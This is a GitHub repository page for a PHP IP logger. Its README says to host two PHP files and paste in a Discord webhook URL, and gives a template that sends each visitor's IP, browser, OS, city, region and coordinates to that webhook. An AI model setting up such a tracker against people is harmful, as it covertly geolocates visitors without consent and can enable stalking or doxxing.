Skip to content

IP Logger using an ip tracker and sends connection information to a discordant channel via webhooks

Notifications You must be signed in to change notification settings

Elyasuuuuu/IP-Logger-Discord-Webhook

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 

Repository files navigation

WebHook IP Tracker

IP Logger using an ip tracker and sends connection information to a discordant channel via webhooks

Installation

  1. Upload the index.php and script.php files to the same level in the tree structure of your web hosting.
  2. To connect your webhook, just replace INSERT WEBHOOK HERE with the link of your webhook
/*<------- WebHooks ------------>*/
$webhook = "INSERT WEBHOOK HERE";

Modification

To change the display of the data, modify this part with MarkDown

"
IP: {$geoplugin->ip}
Os: $user_os
Navigator: $user_browser
Datation: $time
City: {$geoplugin->city}
Region: {$geoplugin->region}
Region Code: {$geoplugin->regionCode}
Region Nom: {$geoplugin->regionName}
DMA Code: {$geoplugin->dmaCode}
Pays: {$geoplugin->countryName}
Code pays: {$geoplugin->countryCode}
Europeen ?: {$geoplugin->inEU}
Latitude: {$geoplugin->latitude}
Longitude: {$geoplugin->longitude}
Accuracy (Miles): {$geoplugin->locationAccuracyRadius}
Timezone: {$geoplugin->timezone}
"

Contributing

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

Please make sure to update tests as appropriate.

License

MIT

About

IP Logger using an ip tracker and sends connection information to a discordant channel via webhooks

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages